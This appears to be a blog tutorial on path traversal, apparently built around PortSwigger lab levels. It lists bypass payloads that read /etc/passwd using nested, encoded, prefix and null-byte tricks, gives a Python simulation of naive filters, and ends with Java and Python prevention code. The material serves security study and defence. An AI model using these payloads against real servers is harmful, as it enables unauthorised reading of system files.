🔐 Path Traversal: Notes, Techniques & Attack Types


🚀 What is Path Traversal?
Path Traversal, also known as Directory Traversal, is a web vulnerability that lets an attacker make the application read files outside the directory it was meant to serve from.
🎯 Objective: Read sensitive files (e.g. /etc/passwd on Linux, win.ini on Windows) or, where the application also writes files, plant content that leads to code execution.
🧩 How It Works
Example scenario:
<img src="/loadImage?filename=218.png">
Backend resolves:
/var/www/images/218.png
An attacker sends:
/loadImage?filename=../../../etc/passwd
Backend resolves:
/var/www/images/../../../etc/passwd
💥 Result: Unauthorized access to system files!
🛠️ Bypass Techniques & Attack Variants
1. 🔁 Basic Traversal (Apprentice)
../../../etc/passwd
➡️ Classic directory stepping.
2. 🧬 Absolute Path Bypass
If traversal sequences are blocked but the application hands the supplied value to the filesystem unchanged:
/etc/passwd
➡️ Use an absolute path from the filesystem root; no ../ is needed at all.
3. 🧩 Nested Traversal Sequences
When the filter strips ../ once, non-recursively, nest one sequence inside another:
....//....//....//etc/passwd
➡️ Deleting the inner ../ from each ....// leaves ../ behind, so the value becomes ../../../etc/passwd after the naive filter runs.
4. 🧪 Encoded Traversal (URL Tricks)
If the filter runs on the raw input and the application URL-decodes afterwards, encode the sequence:
%2e%2e%2f → ../ after one decode
%252e%252e%252f → %2e%2e%2f after the first decode (typically the web server's), then ../ when the application decodes again
Non-standard encodings of / that some decoders still accept:
..%c0%af (overlong UTF-8 encoding of /)
..%ef%bc%8f (UTF-8 for the fullwidth solidus U+FF0F, which Unicode normalisation may fold to /)
💡 Use Burp Intruder's Fuzzing - Path Traversal wordlist!
5. 📂 Start-of-Path Validation
If the app only checks that the supplied path starts with /var/www/images:
/var/www/images/../../../etc/passwd
➡️ Passes the prefix check, then climbs out with .. once the path is resolved.
6. 🖼️ File Extension + Null Byte Bypass
If the app requires the name to end in .png:
../../../etc/passwd%00.png
➡️ The string check sees .png, but a runtime whose filesystem calls take C strings stops at the %00 null byte (PHP before 5.3.4, for example) and opens /etc/passwd.
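To see why each naive defence above fails, here is an added Python example (my own, not code from the original post): a toy version of the image-loading backend from the scenario, one stand-in filter per bypass variant, and the payload that walks around it. BASE, the filter functions and the payloads are assumptions for illustration; nothing is read from the real filesystem, the script only computes the path the backend would pass to open().

```python
"""Added example, not from the original post: the image-loading backend from the
scenario above, with one naive defence per bypass variant and the payload that
defeats it. BASE, the filters and the payloads are assumptions for illustration;
nothing touches the real filesystem, resolve() only computes the path the
backend would pass to open()."""
import posixpath
from urllib.parse import unquote

BASE = "/var/www/images"   # assumed image directory, as in the post's scenario


def resolve(filename):
    """The vulnerable step: join the name onto BASE and let the path library
    collapse '..' and '//'. join() with an absolute second argument drops BASE
    entirely, which is what makes the absolute-path variants work."""
    return posixpath.normpath(posixpath.join(BASE, filename))


# One stand-in defence per variant. Each returns the name the backend would
# go on to use, or None when the request is refused.

def no_filter(name):                          # 1. no check at all
    return name

def block_dotdot(name):                       # 2. refuse names containing "../"
    return None if "../" in name else name

def strip_dotdot_once(name):                  # 3. delete "../" once, non-recursively
    return name.replace("../", "")

def filter_raw_then_decode(name):             # 4a. check the raw bytes, decode afterwards
    return None if "../" in name else unquote(name)

def decode_filter_decode(name):               # 4b. server decodes once, app checks, app decodes again
    once = unquote(name)
    return None if "../" in once else unquote(once)

def must_start_with_base(name):               # 5. only look at the prefix of the supplied path
    return name if name.startswith(BASE) else None

def must_end_with_png(name):                  # 6. extension check on the string, then the
    if not name.endswith(".png"):             #    runtime's C-string open() stops at the NUL
        return None
    return name.split("\x00", 1)[0]


CASES = [
    ("basic traversal",        no_filter,              "../../../etc/passwd"),
    ("absolute path",          block_dotdot,           "/etc/passwd"),
    ("nested sequences",       strip_dotdot_once,      "....//....//....//etc/passwd"),
    ("URL-encoded",            filter_raw_then_decode, "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"),
    ("double URL-encoded",     decode_filter_decode,   "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"),
    ("start-of-path check",    must_start_with_base,   "/var/www/images/../../../etc/passwd"),
    ("null byte + extension",  must_end_with_png,      "../../../etc/passwd\x00.png"),
]


def outcome(defence, payload):
    """Path the backend ends up opening, or 'blocked' if the defence refused it."""
    accepted = defence(payload)
    return "blocked" if accepted is None else resolve(accepted)


def run_all():
    """Map each variant to the path the backend resolves for its payload."""
    return {label: outcome(defence, payload) for label, defence, payload in CASES}


if __name__ == "__main__":
    for label, path in run_all().items():
        print(f"{label:24} -> {path}")
    # The same defences do stop the plain payload; that is why the variants exist.
    print("block_dotdot vs plain  ->", outcome(block_dotdot, "../../../etc/passwd"))
```

Every row ends at /etc/passwd, while the plain ../../../etc/passwd payload is refused by the filters that look for it; the lesson is that each filter inspects a string that is not the one the filesystem finally sees.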
🧱 How to Prevent Path Traversal
✅ Best Practices
❌ Avoid user-supplied file paths.
✅ Use a whitelist of file names or IDs.
✅ Canonicalize and validate the final path.
🧰 Example in Java
```java
File base = new File(BASE_DIRECTORY).getCanonicalFile();   // canonicalize the base too
File file = new File(base, userInput).getCanonicalFile();   // resolves "..", symlinks; throws IOException
// Append the separator: a bare prefix check would also accept /var/www/images_private
if (file.getPath().startsWith(base.getPath() + File.separator)) {
    // Safe to use the file
}
```
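The same canonicalise-then-validate rule in Python, as an added example (my own, not code from the original post): resolve the final path, compare it component-wise against the canonicalised base directory, and refuse NUL bytes before any filesystem call. The base directory, file names and the temporary directory tree it builds to show a symlink escape are all assumptions for illustration.

```python
"""Added example, not from the original post: a resolver that canonicalises the
final path and checks it stays inside the base directory. The base directory,
file names and the throwaway directory tree below are assumptions for illustration."""
import os
import tempfile


class TraversalError(ValueError):
    """Raised when a user-supplied name resolves outside the base directory."""


def safe_resolve(base_dir, user_input):
    """Return the canonical path of user_input inside base_dir, or raise.

    realpath() collapses '..', repeated separators and symlinks, so the check
    runs on the path open() would actually use; it is applied to both sides,
    otherwise a symlinked base directory would never match its own children.
    """
    if "\x00" in user_input:
        # Refuse NUL up front instead of trusting the runtime: older C-backed
        # runtimes silently truncated at the first NUL (the %00.png trick).
        raise TraversalError("NUL byte in file name")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_input))
    # commonpath() compares whole components, so /var/www/images_private is not
    # mistaken for a child of /var/www/images the way a string prefix check is.
    if os.path.commonpath([base, candidate]) != base:
        raise TraversalError(f"{user_input!r} resolves outside {base_dir}")
    return candidate


def classify(base_dir, user_input):
    """'ok' when the name stays inside base_dir, 'rejected' otherwise."""
    try:
        safe_resolve(base_dir, user_input)
        return "ok"
    except TraversalError:
        return "rejected"


def prefix_check_only(base_dir, user_input):
    """The common weaker check: lexical normalisation plus a bare startswith().
    Shown only for its sibling-directory false positive."""
    return os.path.normpath(os.path.join(base_dir, user_input)).startswith(base_dir)


def make_demo_tree():
    """Build a throwaway image directory containing a symlink that points outside
    it. Returns the image directory, or None where symlinks cannot be created."""
    root = tempfile.mkdtemp(prefix="traversal-demo-")
    images, outside = os.path.join(root, "images"), os.path.join(root, "outside")
    os.makedirs(images)
    os.makedirs(outside)
    with open(os.path.join(images, "218.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n")             # constructed placeholder content
    with open(os.path.join(outside, "secret.txt"), "w") as fh:
        fh.write("not meant for the web\n")        # constructed
    try:
        os.symlink(outside, os.path.join(images, "escape"))
    except OSError:
        return None
    return images


if __name__ == "__main__":
    BASE = "/var/www/images"                       # assumed, as in the post's scenario
    for name in ["218.png", "../../../etc/passwd", "/etc/passwd",
                 "....//....//....//etc/passwd", "/var/www/images/../../../etc/passwd",
                 "../../../etc/passwd\x00.png", "../images_private/secret"]:
        print(f"{name!r:48} {classify(BASE, name)}")
    print("bare prefix check accepts ../images_private/secret:",
          prefix_check_only(BASE, "../images_private/secret"))
    tree = make_demo_tree()
    if tree is not None:
        print("escape/secret.txt via symlink:", classify(tree, "escape/secret.txt"))
```

Two details worth noticing. The nested ....// payload is accepted here: with no stripping filter, .... is just a directory name that does not exist, so the request resolves inside the base and simply fails to find a file. And the symlink case is what the canonical-path call in the Java snippet buys you that a purely lexical normpath() does not: the link lives inside the base directory, but the file it points to does not.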
🔍 Summary: Path Traversal Labs (PortSwigger)
| Lab Type | Concept |
| --- | --- |
| 🧠 Apprentice | Basic file traversal |
| 🔓 Practitioner 1 | Absolute path bypass |
| 🎭 Practitioner 2 | Nested traversal to bypass sanitization |
| 🧪 Practitioner 3 | Encoded traversal sequences |
| 🛤️ Practitioner 4 | Start-of-path validation bypass |
| 🧊 Practitioner 5 | Null byte + file extension restriction bypass |
💡 Pro Tips
Combine multiple evasion techniques when needed.
Try traversal in:
URL paths
Query params
Multipart forms
JSON inputs
Headers (like X-File-Path)
🧙♂️ Mastering path traversal opens the door to the server’s soul. Just make sure you’re wearing the white hat while you do it. 🕊️
Written by Ayush Sharma